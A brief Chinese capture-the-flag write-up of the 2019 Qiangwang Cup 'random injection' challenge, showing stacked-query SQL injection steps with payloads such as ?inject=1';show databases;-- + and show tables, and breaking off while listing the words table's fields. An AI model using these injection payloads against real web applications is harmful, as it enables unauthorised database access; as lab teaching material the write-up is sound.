一.2019强网杯随便注入 过滤了一些函数，联合查询，报错，布尔，时间等都不能用了，尝试堆叠注入 1.通过判断是单引号闭合 ?inject=1'-- + 2.尝试堆叠查询数据库 ?inject=1';show databases;-- + 3.查询数据表 ?inject=1';show tables;-- + 4.查询这两张表的字段 words表 两个字段id，data